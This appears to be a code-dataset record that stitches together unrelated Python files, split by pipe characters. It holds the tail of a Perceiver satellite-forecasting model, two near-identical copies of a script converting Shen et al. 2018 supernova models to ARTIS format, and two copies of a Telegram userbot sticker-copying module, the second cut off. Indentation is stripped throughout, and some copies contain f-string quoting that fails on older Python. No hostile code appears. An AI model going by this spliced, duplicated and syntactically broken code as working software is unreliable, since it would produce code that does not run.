# Sort audio for timestep one-hot encode? Or include under other modality?
timestep_modality = InputModality(
name="forecast_time",
input_channels=1, # number of channels for mono audio
input_axis=1, # number of axes, 2 for images
num_freq_bands=self.forecast_steps, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is
sin_only=sin_only,
fourier_encode=encode_fourier,
)
self.model = MultiPerceiver(
modalities=[video_modality, image_modality, timestep_modality],
dim=dim, # dimension of sequence to be encoded
queries_dim=queries_dim, # dimension of decoder queries
logits_dim=logits_dim, # dimension of final logits
depth=depth, # depth of net
num_latents=num_latents, # number of latents, or induced set points, or centroids. different papers giving it different names
latent_dim=latent_dim, # latent dimension
cross_heads=cross_heads, # number of heads for cross attention. paper said 1
latent_heads=latent_heads, # number of heads for latent self attention, 8
cross_dim_head=cross_dim_heads, # number of dimensions per cross attention head
latent_dim_head=latent_dim_heads, # number of dimensions per latent self attention head
weight_tie_layers=weight_tie_layers, # whether to weight tie layers (optional, as indicated in the diagram)
# self_per_cross_attn=self_per_cross_attention, # number of self attention blocks per cross attention
sine_only=sin_only,
fourier_encode_data=encode_fourier,
output_shape=input_size, # Shape of output to make the correct sized logits dim, needed so reshaping works
decoder_ff=decoder_ff, # Optional decoder FF
)
if postprocessor_type is not None:
if postprocessor_type not in ("conv", "patches", "pixels", "conv1x1"):
raise ValueError("Invalid postprocessor_type!")
self.postprocessor = ImageDecoder(
postprocess_type=postprocessor_type, output_channels=sat_channels, **decoder_kwargs
)
else:
self.postprocessor = None
def encode_inputs(self, x: torch.Tensor) -> Dict[str, torch.Tensor]:
video_inputs = x[:, :, : self.sat_channels, :, :]
base_inputs = x[
:, 0, self.sat_channels :, :, :
] # Base maps should be the same for all timesteps in a sample
# Run the preprocessors here when encoding the inputs
if self.preprocessor is not None:
# Expects Channel first
video_inputs = self.preprocessor(video_inputs)
base_inputs = self.preprocessor(base_inputs)
video_inputs = video_inputs.permute(0, 1, 3, 4, 2) # Channel last
base_inputs = base_inputs.permute(0, 2, 3, 1) # Channel last
logger.debug(f"Timeseries: {video_inputs.size()} Base: {base_inputs.size()}")
return {"timeseries": video_inputs, "base": base_inputs}
def add_timestep(self, batch_size: int, timestep: int = 1) -> torch.Tensor:
times = (torch.eye(self.forecast_steps)[timestep]).unsqueeze(-1).unsqueeze(-1)
ones = torch.ones(1, 1, 1)
timestep_input = times * ones
timestep_input = timestep_input.squeeze(-1)
timestep_input = repeat(timestep_input, "... -> b ...", b=batch_size)
logger.debug(f"Forecast Step: {timestep_input.size()}")
return timestep_input
def _train_or_validate_step(self, batch, batch_idx, is_training: bool = True):
x, y = batch
batch_size = y.size(0)
# For each future timestep:
predictions = []
query = self.construct_query(x)
if self.visualize:
vis_x = x.cpu()
x = self.encode_inputs(x)
for i in range(self.forecast_steps):
x["forecast_time"] = self.add_timestep(batch_size, i).type_as(y)
# x_i = self.ct(x["timeseries"], fstep=i)
y_hat = self(x, query=query)
y_hat = rearrange(y_hat, "b h (w c) -> b c h w", c=self.output_channels)
predictions.append(y_hat)
y_hat = torch.stack(predictions, dim=1) # Stack along the timestep dimension
if self.postprocessor is not None:
y_hat = self.postprocessor(y_hat)
if self.visualize:
# Only visualize the second batch of train/val
if batch_idx == 1:
self.visualize_step(
vis_x, y, y_hat, batch_idx, step=f"{'train' if is_training else 'val'}"
)
loss = self.criterion(y, y_hat)
self.log_dict({f"{'train' if is_training else 'val'}/loss": loss})
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"{'train' if is_training else 'val'}/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict)
return loss
def configure_optimizers(self):
# They use LAMB as the optimizer
optimizer = optim.Lamb(self.parameters(), lr=self.lr, betas=(0.9, 0.999))
scheduler = LinearWarmupCosineAnnealingLR(optimizer, warmup_epochs=10, max_epochs=100)
lr_dict = {
# REQUIRED: The scheduler instance
"scheduler": scheduler,
# The unit of the scheduler's step size, could also be 'step'.
# 'epoch' updates the scheduler on epoch end whereas 'step'
# updates it after a optimizer update.
"interval": "step",
# How many epochs/steps should pass between calls to
# `scheduler.step()`. 1 corresponds to updating the learning
# rate after every epoch/step.
"frequency": 1,
# If using the `LearningRateMonitor` callback to monitor the
# learning rate progress, this keyword can be used to specify
# a custom logged name
"name": None,
}
return {"optimizer": optimizer, "lr_scheduler": lr_dict}
def construct_query(self, x):
# key, value: B x N x K; query: B x M x K
# Attention maps -> B x N x M
# Output -> B x M x K
# So want query to be B X (T*H*W) X C to reshape to B x T x C x H x W
if self.preprocessor is not None:
x = self.preprocessor(x)
y_query = x[:, -1, 0, :, :] # Only want sat channels, the output
# y_query = torch.permute(y_query, (0, 2, 3, 1)) # Channel Last
# Need to reshape to 3 dimensions, TxHxW or HxWxC
# y_query = rearrange(y_query, "b h w d -> b (h w) d")
logger.debug(f"Query Shape: {y_query.shape}")
return y_query
def forward(self, x, mask=None, query=None):
return self.model.forward(x, mask=mask, queries=query)
class MultiPerceiverSat(torch.nn.Module):
def __init__(
self,
use_input_as_query: bool = False,
use_learnable_query: bool = False,
**kwargs,
):
"""
PerceiverIO made to work more specifically with timeseries images
Not a recurrent model, so like MetNet somewhat, can optionally give a one-hot encoded vector for the future
timestep
Args:
input_channels: Number of input channels
forecast_steps: Number of forecast steps to make
**kwargs:
"""
super(MultiPerceiverSat, self).__init__()
self.multi_perceiver = MultiPerceiver(**kwargs)
if use_learnable_query:
self.learnable_query = torch.nn.Linear(self.query_dim, self.query_dim)
self.distribution = uniform.Uniform(low=torch.Tensor([0.0]), high=torch.Tensor([1.0]))
self.query_dim = kwargs.get("query_dim", 32)
self.query_future_size = prod(kwargs.get("output_shape", [24, 32, 32]))
# Like GAN sorta, random input, learn important parts in linear layer T*H*W shape,
# need to add Fourier features too though
def forward(self, multi_modality_data: Dict[str, torch.Tensor], mask=None, queries=None):
data = self.multi_perceiver.forward(multi_modality_data)
# Create learnable query here, need to add fourier features as well
if self.use_learnable_query:
# Create learnable query, also adds somewhat ensemble on multiple forward passes
# Middle is the shape of the future timesteps and such
z = self.distribution.sample(
(data.shape[0], self.query_future_size, self.query_dim)
).type_as(data)
queries = self.learnable_query(z)
# Add Fourier Features now to the query
perceiver_output = self.multi_perceiver.perceiver.forward(data, mask, queries)
logger.debug(f"Perceiver Finished Output: {perceiver_output.size()}")
return perceiver_output
|
#!/usr/bin/env python3
import argparse
import math
import os.path
import numpy as np
import pandas as pd
from astropy import units as u
import artistools as at
def addargs(parser):
parser.add_argument('-inputpath', '-i',
default='1.00_5050.dat',
help='Path of input file')
parser.add_argument('-outputpath', '-o',
default='.',
help='Path for output files')
def main(args=None, argsraw=None, **kwargs) -> None:
if args is None:
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Convert Shen et al. 2018 models to ARTIS format.')
addargs(parser)
parser.set_defaults(**kwargs)
args = parser.parse_args(argsraw)
with open(args.inputpath) as infile:
columns = infile.readline().split()
atomicnumberofspecies = {}
isotopesofelem = {}
for species in columns[5:]:
atomic_number = at.get_atomic_number(species.rstrip('0123456789'))
atomicnumberofspecies[species] = atomic_number
isotopesofelem.setdefault(atomic_number, list()).append(species)
datain = pd.read_csv(args.inputpath, delim_whitespace=True, skiprows=0, header=[0]).dropna()
dfmodel = pd.DataFrame(
columns=[
'inputcellid', 'velocity_outer', 'logrho', 'X_Fegroup', 'X_Ni56', 'X_Co56', 'X_Fe52', 'X_Cr48',
'X_Ni57', 'X_Co57'])
dfmodel.index.name = 'cellid'
dfabundances = pd.DataFrame(columns=['inputcellid', *['X_' + at.elsymbols[x] for x in range(1, 31)]])
dfabundances.index.name = 'cellid'
t_model_init_seconds = 10.
t_model_init_days = t_model_init_seconds / 24 / 60 / 60
v_inner = 0. # velocity at inner boundary of cell
m_enc_inner = 0. # mass enclosed at inner boundary
tot_ni56mass = 0.
for cellid, shell in datain.iterrows():
m_enc_outer = float(shell['m']) * u.solMass.to('g') # convert Solar masses to grams
v_outer = float(shell['v']) * 1e-5 # convert cm/s to km/s
m_shell_grams = (m_enc_outer - m_enc_inner)
r_outer = v_outer * 1e5 * t_model_init_seconds
r_inner = v_inner * 1e5 * t_model_init_seconds
vol_shell = 4. / 3. * math.pi * (r_outer ** 3 - r_inner ** 3)
rho = m_shell_grams / vol_shell
tot_ni56mass += m_shell_grams * shell.ni56
abundances = [0. for _ in range(31)]
X_fegroup = 0.
for atomic_number in range(1, 31):
abundances[atomic_number] = sum([float(shell[species]) for species in isotopesofelem[atomic_number]])
if atomic_number >= 26:
X_fegroup += abundances[atomic_number]
radioabundances = [X_fegroup, shell.ni56, shell.co56, shell.fe52, shell.cr48, shell.ni57, shell.co57]
dfmodel.loc[cellid] = [cellid, v_outer, math.log10(rho), *radioabundances]
dfabundances.loc[cellid] = [cellid, *abundances[1:31]]
v_inner = v_outer
m_enc_inner = m_enc_outer
print(f'M_tot = {m_enc_outer / u.solMass.to('g'):.3f} solMass')
print(f'M_Ni56 = {tot_ni56mass / u.solMass.to('g'):.3f} solMass')
at.save_modeldata(dfmodel, t_model_init_days, os.path.join(args.outputpath, 'model.txt'))
at.inputmodel.save_initialabundances(dfabundances, os.path.join(args.outputpath, 'abundances.txt'))
if __name__ == "__main__":
main()
| #!/usr/bin/env python3
import argparse
import math
import os.path
import numpy as np
import pandas as pd
from astropy import units as u
import artistools as at
def addargs(parser):
parser.add_argument('-inputpath', '-i',
default='1.00_5050.dat',
help='Path of input file')
parser.add_argument('-outputpath', '-o',
default='.',
help='Path for output files')
def main(args=None, argsraw=None, **kwargs) -> None:
if args is None:
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Convert Shen et al. 2018 models to ARTIS format.')
addargs(parser)
parser.set_defaults(**kwargs)
args = parser.parse_args(argsraw)
with open(args.inputpath) as infile:
columns = infile.readline().split()
atomicnumberofspecies = {}
isotopesofelem = {}
for species in columns[5:]:
atomic_number = at.get_atomic_number(species.rstrip('0123456789'))
atomicnumberofspecies[species] = atomic_number
isotopesofelem.setdefault(atomic_number, list()).append(species)
datain = pd.read_csv(args.inputpath, delim_whitespace=True, skiprows=0, header=[0]).dropna()
dfmodel = pd.DataFrame(
columns=[
'inputcellid', 'velocity_outer', 'logrho', 'X_Fegroup', 'X_Ni56', 'X_Co56', 'X_Fe52', 'X_Cr48',
'X_Ni57', 'X_Co57'])
dfmodel.index.name = 'cellid'
dfabundances = pd.DataFrame(columns=['inputcellid', *['X_' + at.elsymbols[x] for x in range(1, 31)]])
dfabundances.index.name = 'cellid'
t_model_init_seconds = 10.
t_model_init_days = t_model_init_seconds / 24 / 60 / 60
v_inner = 0. # velocity at inner boundary of cell
m_enc_inner = 0. # mass enclosed at inner boundary
tot_ni56mass = 0.
for cellid, shell in datain.iterrows():
m_enc_outer = float(shell['m']) * u.solMass.to('g') # convert Solar masses to grams
v_outer = float(shell['v']) * 1e-5 # convert cm/s to km/s
m_shell_grams = (m_enc_outer - m_enc_inner)
r_outer = v_outer * 1e5 * t_model_init_seconds
r_inner = v_inner * 1e5 * t_model_init_seconds
vol_shell = 4. / 3. * math.pi * (r_outer ** 3 - r_inner ** 3)
rho = m_shell_grams / vol_shell
tot_ni56mass += m_shell_grams * shell.ni56
abundances = [0. for _ in range(31)]
X_fegroup = 0.
for atomic_number in range(1, 31):
abundances[atomic_number] = sum([float(shell[species]) for species in isotopesofelem[atomic_number]])
if atomic_number >= 26:
X_fegroup += abundances[atomic_number]
radioabundances = [X_fegroup, shell.ni56, shell.co56, shell.fe52, shell.cr48, shell.ni57, shell.co57]
dfmodel.loc[cellid] = [cellid, v_outer, math.log10(rho), *radioabundances]
dfabundances.loc[cellid] = [cellid, *abundances[1:31]]
v_inner = v_outer
m_enc_inner = m_enc_outer
print(f'M_tot = {m_enc_outer / u.solMass.to("g"):.3f} solMass')
print(f'M_Ni56 = {tot_ni56mass / u.solMass.to("g"):.3f} solMass')
at.save_modeldata(dfmodel, t_model_init_days, os.path.join(args.outputpath, 'model.txt'))
at.inputmodel.save_initialabundances(dfabundances, os.path.join(args.outputpath, 'abundances.txt'))
if __name__ == "__main__":
main()
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
KANGING_STR = [
"Eh... Koq bagus... aku curry ahhh :3",
"Aku curry ya kakak :)",
"Curry Sticker dulu yee kan",
"ehh, mantep nih.....aku ambil ya kaga",
"Bagus eaaaa....\nAmbil ahh....",
"Ini Sticker aku ambil yaa\nDUARR!",
"leh ugha ni Sticker\nCurry ahh~",
"Pim Pim Pom!!!\nni Sticker punya aing sekarang hehe",
"Bentar boss, ane curry dulu",
"Ihh, bagus nih\nCurry ahh~",
"Curry lagi yee kan.....",
"CURRY TROSS!!!",
"Bolehkah saya curry ni sticker\nau ah curry aja hehe",
"Curry Sticker ahh.....",
"Curry dolo boss",
"Swiper jangan mencurry hh",
]
@register(outgoing=True, pattern="^\.curry")
async def kang(args):
""" For .kang command, kangs stickers or creates new ones. """
user = await bot.get_me()
if not user.username:
user.username = user.first_name
message = await args.get_reply_message()
photo = None
emojibypass = False
is_anim = False
emoji = None
if message and message.media:
if isinstance(message.media, MessageMediaPhoto):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
photo = await bot.download_media(message.photo, photo)
elif "image" in message.media.document.mime_type.split('/'):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
await bot.download_file(message.media.document, photo)
if (DocumentAttributeFilename(file_name='sticker.webp') in
message.media.document.attributes):
emoji = message.media.document.attributes[1].alt
if emoji != '':
emojibypass = True
elif "tgsticker" in message.media.document.mime_type:
await args.edit(f"`{random.choice(KANGING_STR)}`")
await bot.download_file(message.media.document,
'AnimatedSticker.tgs')
attributes = message.media.document.attributes
for attribute in attributes:
if isinstance(attribute, DocumentAttributeSticker):
emoji = attribute.alt
emojibypass = True
is_anim = True
photo = 1
else:
await args.edit("`Unsupported File!`")
return
else:
await args.edit("`I can't kang that...`")
return
if photo:
splat = args.text.split()
if not emojibypass:
emoji = "🤔"
pack = 1
if len(splat) == 3:
pack = splat[2] # User sent both
emoji = splat[1]
elif len(splat) == 2:
if splat[1].isnumeric():
# User wants to push into different pack, but is okay with
# thonk as emote.
pack = int(splat[1])
else:
# User sent just custom emote, wants to push to default
# pack
emoji = splat[1]
packname = f"a{user.id}_by_{user.username}_{pack}"
packnick = f"@{user.username}'s kang pack Vol.{pack}"
cmd = '/newpack'
file = io.BytesIO()
if not is_anim:
image = await resize_photo(photo)
file.name = "sticker.png"
image.save(file, "PNG")
else:
packname += "_anim"
packnick += " (Animated)"
cmd = '/newanimated'
response = urllib.request.urlopen(
urllib.request.Request(f'http://t.me/addstickers/{packname}'))
htmlstr = response.read().decode("utf8").split('\n')
if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
async with bot.conversation('Stickers') as conv:
await conv.send_message('/addsticker')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packname)
x = await conv.get_response()
while "120" in x.text:
pack += 1
packname = f"a{user.id}_by_{user.username}_{pack}"
packnick = f"@{user.username}'s kang pack Vol.{pack}"
await args.edit("`Switching to Pack " + str(pack) +
" due to insufficient space`")
await conv.send_message(packname)
x = await conv.get_response()
if x.text == "Invalid pack selected.":
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
await conv.get_response()
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname})",
parse_mode='md')
return
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message('/done')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
else:
await args.edit("`Brewing a new Pack...`")
async with bot.conversation('Stickers') as conv:
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Thanks Stikernya Bro hehe!`\
\n[Klik Disini!](t.me/addstickers/{packname}) Untuk Melihat Stiker Saya😄",
parse_mode='md')
async def resize_photo(photo):
""" Resize the given photo to 512x512 """
image = Image.open(photo)
maxsize = (512, 512)
if (image.width and image.height) < 512:
size1 = image.width
size2 = image.height
if image.width > image.height:
scale = 512 / size1
size1new = 512
size2new = size2 * scale
else:
scale = 512 / size2
size1new = size1 * scale
size2new = 512
size1new = math.floor(size1new)
size2new = math.floor(size2new)
sizenew = (size1new, size2new)
image = image.resize(sizenew)
else:
image.thumbnail(maxsize)
return image
@register(outgoing=True, pattern="^\.stkrinfo$")
async def get_pack_info(event):
if not event.is_reply:
await event.edit("`I can't fetch info from nothing, can I ?!`")
return
rep_msg = await event.get_reply_message()
if not rep_msg.document:
await event.edit("`Reply to a sticker to get the pack details`")
return
try:
stickerset_attr = rep_msg.document.attributes[1]
await event.edit(
"`Fetching details of the sticker pack, please wait..`")
except BaseException:
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
if not isinstance(stickerset_attr, DocumentAttributeSticker):
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
get_stickerset = await bot(
GetStickerSetRequest(
InputStickerSetID(
id=stickerset_attr.stickerset.id,
access_hash=stickerset_attr.stickerset.access_hash)))
pack_emojis = []
for document_sticker in get_stickerset.packs:
if document_sticker.emoticon not in pack_emojis:
pack_emojis.append(document_sticker.emoticon)
OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
f"**Official:** `{get_stickerset.set.official}`\n" \
f"**Archived:** `{get_stickerset.set.archived}`\n" \
f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
f"**Emojis In Pack:**\n{" ".join(pack_emojis)}"
await event.edit(OUTPUT)
@register(outgoing=True, pattern="^\.get$")
async def sticker_to_png(sticker):
if not sticker.is_reply:
await sticker.edit("`NULL information to fetch...`")
return False
img = await sticker.get_reply_message()
if not img.document:
await sticker.edit("`Reply to a sticker...`")
return False
try:
img.document.attributes[1]
except Exception:
await sticker.edit("`This is not a sticker...`")
return
with io.BytesIO() as image:
await sticker.client.download_media(img, image)
image.name = 'sticker.png'
image.seek(0)
try:
await img.reply(file=image, force_document=True)
except Exception:
await sticker.edit("`Err, can't send file...`")
else:
await sticker.delete()
return
CMD_HELP.update({
"stickers":
">`.curry [emoji('s)]?`"
"\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack "
"\nor specify the emoji you want to."
"\n\n>`.curry (emoji['s]]?` [number]?"
"\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji "
"or choose the emoji you want to."
"\n\n>`.stkrinfo`"
"\nUsage: Gets info about the sticker pack."
"\n\n>`.get`"
"\nUsage: reply to a sticker to get 'PNG' file of sticker."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
KANGING_STR = [
"Eh... Koq bagus... aku curry ahhh :3",
"Aku curry ya kakak :)",
"Curry Sticker dulu yee kan",
"ehh, mantep nih.....aku ambil ya kaga",
"Bagus eaaaa....\nAmbil ahh....",
"Ini Sticker aku ambil yaa\nDUARR!",
"leh ugha ni Sticker\nCurry ahh~",
"Pim Pim Pom!!!\nni Sticker punya aing sekarang hehe",
"Bentar boss, ane curry dulu",
"Ihh, bagus nih\nCurry ahh~",
"Curry lagi yee kan.....",
"CURRY TROSS!!!",
"Bolehkah saya curry ni sticker\nau ah curry aja hehe",
"Curry Sticker ahh.....",
"Curry dolo boss",
"Swiper jangan mencurry hh",
]
@register(outgoing=True, pattern="^\.curry")
async def kang(args):
""" For .kang command, kangs stickers or creates new ones. """
user = await bot.get_me()
if not user.username:
user.username = user.first_name
message = await args.get_reply_message()
photo = None
emojibypass = False
is_anim = False
emoji = None
if message and message.media:
if isinstance(message.media, MessageMediaPhoto):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
photo = await bot.download_media(message.photo, photo)
elif "image" in message.media.document.mime_type.split('/'):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
await bot.download_file(message.media.document, photo)
if (DocumentAttributeFilename(file_name='sticker.webp') in
message.media.document.attributes):
emoji = message.media.document.attributes[1].alt
if emoji != '':
emojibypass = True
elif "tgsticker" in message.media.document.mime_type:
await args.edit(f"`{random.choice(KANGING_STR)}`")
await bot.download_file(message.media.document,
'AnimatedSticker.tgs')
attributes = message.media.document.attributes
for attribute in attributes:
if isinstance(attribute, DocumentAttributeSticker):
emoji = attribute.alt
emojibypass = True
is_anim = True
photo = 1
else:
await args.edit("`Unsupported File!`")
return
else:
await args.edit("`I can't kang that...`")
return
if photo:
splat = args.text.split()
if not emojibypass:
emoji = "🤔"
pack = 1
if len(splat) == 3:
pack = splat[2] # User sent both
emoji = splat[1]
elif len(splat) == 2:
if splat[1].isnumeric():
# User wants to push into different pack, but is okay with
# thonk as emote.
pack = int(splat[1])
else:
# User sent just custom emote, wants to push to default
# pack
emoji = splat[1]
packname = f"a{user.id}_by_{user.username}_{pack}"
packnick = f"@{user.username}'s kang pack Vol.{pack}"
cmd = '/newpack'
file = io.BytesIO()
if not is_anim:
image = await resize_photo(photo)
file.name = "sticker.png"
image.save(file, "PNG")
else:
packname += "_anim"
packnick += " (Animated)"
cmd = '/newanimated'
response = urllib.request.urlopen(
urllib.request.Request(f'http://t.me/addstickers/{packname}'))
htmlstr = response.read().decode("utf8").split('\n')
if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
async with bot.conversation('Stickers') as conv:
await conv.send_message('/addsticker')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packname)
x = await conv.get_response()
while "120" in x.text:
pack += 1
packname = f"a{user.id}_by_{user.username}_{pack}"
packnick = f"@{user.username}'s kang pack Vol.{pack}"
await args.edit("`Switching to Pack " + str(pack) +
" due to insufficient space`")
await conv.send_message(packname)
x = await conv.get_response()
if x.text == "Invalid pack selected.":
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
await conv.get_response()
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname})",
parse_mode='md')
return
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message('/done')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
else:
await args.edit("`Brewing a new Pack...`")
async with bot.conversation('Stickers') as conv:
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "Sorry, the file type is invalid." in rsp.text:
await args.edit(
"`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
)
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"`Thanks Stikernya Bro hehe!`\
\n[Klik Disini!](t.me/addstickers/{packname}) Untuk Melihat Stiker Saya😄",
parse_mode='md')
async def resize_photo(photo):
""" Resize the given photo to 512x512 """
image = Image.open(photo)
maxsize = (512, 512)
if (image.width and image.height) < 512:
size1 = image.width
size2 = image.height
if image.width > image.height:
scale = 512 / size1
size1new = 512
size2new = size2 * scale
else:
scale = 512 / size2
size1new = size1 * scale
size2new = 512
size1new = math.floor(size1new)
size2new = math.floor(size2new)
sizenew = (size1new, size2new)
image = image.resize(sizenew)
else:
image.thumbnail(maxsize)
return image
@register(outgoing=True, pattern="^\.stkrinfo$")
async def get_pack_info(event):
if not event.is_reply:
await event.edit("`I can't fetch info from nothing, can I ?!`")
return
rep_msg = await event.get_reply_message()
if not rep_msg.document:
await event.edit("`Reply to a sticker to get the pack details`")
return
try:
stickerset_attr = rep_msg.document.attributes[1]
await event.edit(
"`Fetching details of the sticker pack, please wait..`")
except BaseException:
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
if not isinstance(stickerset_attr, DocumentAttributeSticker):
